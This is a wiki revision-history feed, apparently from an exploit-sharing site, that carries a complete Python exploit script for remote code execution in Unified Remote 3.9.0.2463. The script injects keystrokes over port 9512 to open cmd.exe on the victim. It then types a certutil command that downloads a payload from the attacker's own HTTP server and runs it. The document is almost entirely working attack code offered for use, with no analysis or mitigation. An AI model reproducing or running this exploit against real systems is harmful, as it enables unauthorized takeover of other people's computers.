<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Unified Remote 3.9.0.2463 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T05:08:51Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1494&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1494&amp;oldid=prev"/>
		<updated>2021-04-11T01:07:02Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution&lt;br /&gt;
# Author: H4rk3nz0&lt;br /&gt;
# Vendor Homepage: https://www.unifiedremote.com/&lt;br /&gt;
# Software Link: https://www.unifiedremote.com/download&lt;br /&gt;
# Tested on: Windows 10, 10.0.19042 Build 19042&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
import socket&lt;br /&gt;
import sys&lt;br /&gt;
import os&lt;br /&gt;
from time import sleep&lt;br /&gt;
&lt;br /&gt;
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
&lt;br /&gt;
port = 9512&lt;br /&gt;
&lt;br /&gt;
# Packet Data Declarations; Windows, Space and Enter have non-standard values&lt;br /&gt;
&lt;br /&gt;
open = (&amp;quot;00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862&amp;quot;&lt;br /&gt;
&amp;quot;2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400&amp;quot;&lt;br /&gt;
&amp;quot;0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831&amp;quot;&lt;br /&gt;
&amp;quot;000356657273696f6e000000000a00&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
open_fin = (&amp;quot;000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7&amp;quot;&lt;br /&gt;
&amp;quot;3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453&amp;quot;&lt;br /&gt;
&amp;quot;796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646&amp;quot;&lt;br /&gt;
&amp;quot;5643430373664653736366464363134343336313938303961643766333538353864343439320008526571&amp;quot;&lt;br /&gt;
&amp;quot;75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000&amp;quot;&lt;br /&gt;
).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
one = (&amp;quot;000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024&amp;quot;&lt;br /&gt;
&amp;quot;c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756&amp;quot;&lt;br /&gt;
&amp;quot;5730002000556616c756500&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
two = (&amp;quot;00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007&amp;quot;&lt;br /&gt;
&amp;quot;0252756e0002457874726173000656616c7565730002000556616c756500&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
three = (&amp;quot;00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730&amp;quot;&lt;br /&gt;
&amp;quot;386531346535323834636238310000&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
win_key = (&amp;quot;000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726&amp;quot;&lt;br /&gt;
&amp;quot;400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065&amp;quot;&lt;br /&gt;
&amp;quot;6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797&amp;quot;&lt;br /&gt;
&amp;quot;0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055&amp;quot;&lt;br /&gt;
&amp;quot;6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6&amp;quot;&lt;br /&gt;
&amp;quot;9642d643730386531346535323834636238310000&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
ret_key = (&amp;quot;000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172&amp;quot;&lt;br /&gt;
&amp;quot;6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000&amp;quot;&lt;br /&gt;
&amp;quot;656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000&amp;quot;&lt;br /&gt;
&amp;quot;08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730&amp;quot;&lt;br /&gt;
&amp;quot;002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365&amp;quot;&lt;br /&gt;
&amp;quot;00616e64726f69642d643730386531346535323834636238310000&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
space_key = (&amp;quot;000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6&amp;quot;&lt;br /&gt;
&amp;quot;1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617&amp;quot;&lt;br /&gt;
&amp;quot;3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650&amp;quot;&lt;br /&gt;
&amp;quot;00008547970650008000000085265717565737400070252756e0002457874726173000656616c756&amp;quot;&lt;br /&gt;
&amp;quot;5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726&amp;quot;&lt;br /&gt;
&amp;quot;36500616e64726f69642d643730386531346535323834636238310000&amp;quot;).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
# ASCII to Hex Conversion Set&lt;br /&gt;
characters={&lt;br /&gt;
	&amp;quot;A&amp;quot;:&amp;quot;41&amp;quot;,&amp;quot;B&amp;quot;:&amp;quot;42&amp;quot;,&amp;quot;C&amp;quot;:&amp;quot;43&amp;quot;,&amp;quot;D&amp;quot;:&amp;quot;44&amp;quot;,&amp;quot;E&amp;quot;:&amp;quot;45&amp;quot;,&amp;quot;F&amp;quot;:&amp;quot;46&amp;quot;,&amp;quot;G&amp;quot;:&amp;quot;47&amp;quot;,&amp;quot;H&amp;quot;:&amp;quot;48&amp;quot;,&amp;quot;I&amp;quot;:&amp;quot;49&amp;quot;,&amp;quot;J&amp;quot;:&amp;quot;4a&amp;quot;,&amp;quot;K&amp;quot;:&amp;quot;4b&amp;quot;,&amp;quot;L&amp;quot;:&amp;quot;4c&amp;quot;,&amp;quot;M&amp;quot;:&amp;quot;4d&amp;quot;,&amp;quot;N&amp;quot;:&amp;quot;4e&amp;quot;,&lt;br /&gt;
	&amp;quot;O&amp;quot;:&amp;quot;4f&amp;quot;,&amp;quot;P&amp;quot;:&amp;quot;50&amp;quot;,&amp;quot;Q&amp;quot;:&amp;quot;51&amp;quot;,&amp;quot;R&amp;quot;:&amp;quot;52&amp;quot;,&amp;quot;S&amp;quot;:&amp;quot;53&amp;quot;,&amp;quot;T&amp;quot;:&amp;quot;54&amp;quot;,&amp;quot;U&amp;quot;:&amp;quot;55&amp;quot;,&amp;quot;V&amp;quot;:&amp;quot;56&amp;quot;,&amp;quot;W&amp;quot;:&amp;quot;57&amp;quot;,&amp;quot;X&amp;quot;:&amp;quot;58&amp;quot;,&amp;quot;Y&amp;quot;:&amp;quot;59&amp;quot;,&amp;quot;Z&amp;quot;:&amp;quot;5a&amp;quot;,&lt;br /&gt;
	&amp;quot;a&amp;quot;:&amp;quot;61&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;62&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;63&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;64&amp;quot;,&amp;quot;e&amp;quot;:&amp;quot;65&amp;quot;,&amp;quot;f&amp;quot;:&amp;quot;66&amp;quot;,&amp;quot;g&amp;quot;:&amp;quot;67&amp;quot;,&amp;quot;h&amp;quot;:&amp;quot;68&amp;quot;,&amp;quot;i&amp;quot;:&amp;quot;69&amp;quot;,&amp;quot;j&amp;quot;:&amp;quot;6a&amp;quot;,&amp;quot;k&amp;quot;:&amp;quot;6b&amp;quot;,&amp;quot;l&amp;quot;:&amp;quot;6c&amp;quot;,&amp;quot;m&amp;quot;:&amp;quot;6d&amp;quot;,&amp;quot;n&amp;quot;:&amp;quot;6e&amp;quot;,&lt;br /&gt;
	&amp;quot;o&amp;quot;:&amp;quot;6f&amp;quot;,&amp;quot;p&amp;quot;:&amp;quot;70&amp;quot;,&amp;quot;q&amp;quot;:&amp;quot;71&amp;quot;,&amp;quot;r&amp;quot;:&amp;quot;72&amp;quot;,&amp;quot;s&amp;quot;:&amp;quot;73&amp;quot;,&amp;quot;t&amp;quot;:&amp;quot;74&amp;quot;,&amp;quot;u&amp;quot;:&amp;quot;75&amp;quot;,&amp;quot;v&amp;quot;:&amp;quot;76&amp;quot;,&amp;quot;w&amp;quot;:&amp;quot;77&amp;quot;,&amp;quot;x&amp;quot;:&amp;quot;78&amp;quot;,&amp;quot;y&amp;quot;:&amp;quot;79&amp;quot;,&amp;quot;z&amp;quot;:&amp;quot;7a&amp;quot;,&lt;br /&gt;
	&amp;quot;1&amp;quot;:&amp;quot;31&amp;quot;,&amp;quot;2&amp;quot;:&amp;quot;32&amp;quot;,&amp;quot;3&amp;quot;:&amp;quot;33&amp;quot;,&amp;quot;4&amp;quot;:&amp;quot;34&amp;quot;,&amp;quot;5&amp;quot;:&amp;quot;35&amp;quot;,&amp;quot;6&amp;quot;:&amp;quot;36&amp;quot;,&amp;quot;7&amp;quot;:&amp;quot;37&amp;quot;,&amp;quot;8&amp;quot;:&amp;quot;38&amp;quot;,&amp;quot;9&amp;quot;:&amp;quot;39&amp;quot;,&amp;quot;0&amp;quot;:&amp;quot;30&amp;quot;,&lt;br /&gt;
	&amp;quot;+&amp;quot;:&amp;quot;2b&amp;quot;,&amp;quot;=&amp;quot;:&amp;quot;3d&amp;quot;,&amp;quot;/&amp;quot;:&amp;quot;2f&amp;quot;,&amp;quot;_&amp;quot;:&amp;quot;5f&amp;quot;,&amp;quot;&amp;lt;&amp;quot;:&amp;quot;3c&amp;quot;,&lt;br /&gt;
	&amp;quot;&amp;gt;&amp;quot;:&amp;quot;3e&amp;quot;,&amp;quot;[&amp;quot;:&amp;quot;5b&amp;quot;,&amp;quot;]&amp;quot;:&amp;quot;5d&amp;quot;,&amp;quot;!&amp;quot;:&amp;quot;21&amp;quot;,&amp;quot;@&amp;quot;:&amp;quot;40&amp;quot;,&amp;quot;#&amp;quot;:&amp;quot;23&amp;quot;,&amp;quot;$&amp;quot;:&amp;quot;24&amp;quot;,&amp;quot;%&amp;quot;:&amp;quot;25&amp;quot;,&amp;quot;^&amp;quot;:&amp;quot;5e&amp;quot;,&amp;quot;&amp;amp;&amp;quot;:&amp;quot;26&amp;quot;,&amp;quot;*&amp;quot;:&amp;quot;2a&amp;quot;,&lt;br /&gt;
	&amp;quot;(&amp;quot;:&amp;quot;28&amp;quot;,&amp;quot;)&amp;quot;:&amp;quot;29&amp;quot;,&amp;quot;-&amp;quot;:&amp;quot;2d&amp;quot;,&amp;quot;'&amp;quot;:&amp;quot;27&amp;quot;,'&amp;quot;':&amp;quot;22&amp;quot;,&amp;quot;:&amp;quot;:&amp;quot;3a&amp;quot;,&amp;quot;;&amp;quot;:&amp;quot;3b&amp;quot;,&amp;quot;?&amp;quot;:&amp;quot;3f&amp;quot;,&amp;quot;`&amp;quot;:&amp;quot;60&amp;quot;,&amp;quot;~&amp;quot;:&amp;quot;7e&amp;quot;,&lt;br /&gt;
	&amp;quot;\\&amp;quot;:&amp;quot;5c&amp;quot;,&amp;quot;|&amp;quot;:&amp;quot;7c&amp;quot;,&amp;quot;{&amp;quot;:&amp;quot;7b&amp;quot;,&amp;quot;}&amp;quot;:&amp;quot;7d&amp;quot;,&amp;quot;,&amp;quot;:&amp;quot;2c&amp;quot;,&amp;quot;.&amp;quot;:&amp;quot;2e&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
# User Specified arguments&lt;br /&gt;
try:&lt;br /&gt;
	rhost = sys.argv[1]&lt;br /&gt;
	lhost = sys.argv[2]&lt;br /&gt;
	payload = sys.argv[3]&lt;br /&gt;
except:&lt;br /&gt;
	print(&amp;quot;Usage: python &amp;quot; + sys.argv[0] + &amp;quot; &amp;lt;target-ip&amp;gt; &amp;lt;local-http-ip&amp;gt; &amp;lt;payload-name&amp;gt;&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Send Windows Key Input Twice&lt;br /&gt;
def SendWin():&lt;br /&gt;
	target.sendto(win_key,(rhost, port))&lt;br /&gt;
	target.sendto(win_key,(rhost, port))&lt;br /&gt;
	sleep(0.4)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Send Enter/Return Key Input&lt;br /&gt;
def SendReturn():&lt;br /&gt;
	target.sendto(ret_key,(rhost, port))&lt;br /&gt;
	sleep(0.4)&lt;br /&gt;
&lt;br /&gt;
# Send String Characters&lt;br /&gt;
def SendString(string, rhost):&lt;br /&gt;
	for char in string:&lt;br /&gt;
		if char == &amp;quot; &amp;quot;:&lt;br /&gt;
			target.sendto(space_key,(rhost, port))&lt;br /&gt;
			sleep(0.02)&lt;br /&gt;
		else:&lt;br /&gt;
			convert = characters[char].decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
			target.sendto(one + convert + two + convert + three,(rhost, port))&lt;br /&gt;
			sleep(0.02)&lt;br /&gt;
&lt;br /&gt;
# Main Execution&lt;br /&gt;
def main():&lt;br /&gt;
	target.connect((rhost,port))&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
	print(&amp;quot;[+] Connecting to target...&amp;quot;)&lt;br /&gt;
	target.sendto(open,(rhost,port)) 	# Initialize Connection to Unified&lt;br /&gt;
	sleep(0.02)&lt;br /&gt;
	target.sendto(open_fin,(rhost,port)) 	# Finish Initializing Connection&lt;br /&gt;
	print(&amp;quot;[+] Popping Start Menu&amp;quot;)&lt;br /&gt;
	sleep(0.02)&lt;br /&gt;
	SendWin()&lt;br /&gt;
	sleep(0.3)&lt;br /&gt;
	print(&amp;quot;[+] Opening CMD&amp;quot;)&lt;br /&gt;
	SendString(&amp;quot;cmd.exe&amp;quot;, rhost)&lt;br /&gt;
	sleep(0.3)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	sleep(0.3)&lt;br /&gt;
	print(&amp;quot;[+] *Super Fast Hacker Typing*&amp;quot;)&lt;br /&gt;
	SendString(&amp;quot;certutil.exe -f -urlcache http://&amp;quot; + lhost + &amp;quot;/&amp;quot; + payload + &amp;quot; C:\\Windows\\Temp\\&amp;quot; + payload, rhost) # Retrieve HTTP hosted payload&lt;br /&gt;
	sleep(0.3)&lt;br /&gt;
	print(&amp;quot;[+] Downloading Payload&amp;quot;)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	sleep(3)&lt;br /&gt;
	SendString(&amp;quot;C:\\Windows\\Temp\\&amp;quot; + payload, rhost) # Execute Payload&lt;br /&gt;
	sleep(0.3)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	print(&amp;quot;[+] Done! Check listener?&amp;quot;)&lt;br /&gt;
	target.close()&lt;br /&gt;
&lt;br /&gt;
if __name__==&amp;quot;__main__&amp;quot;:&lt;br /&gt;
	main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>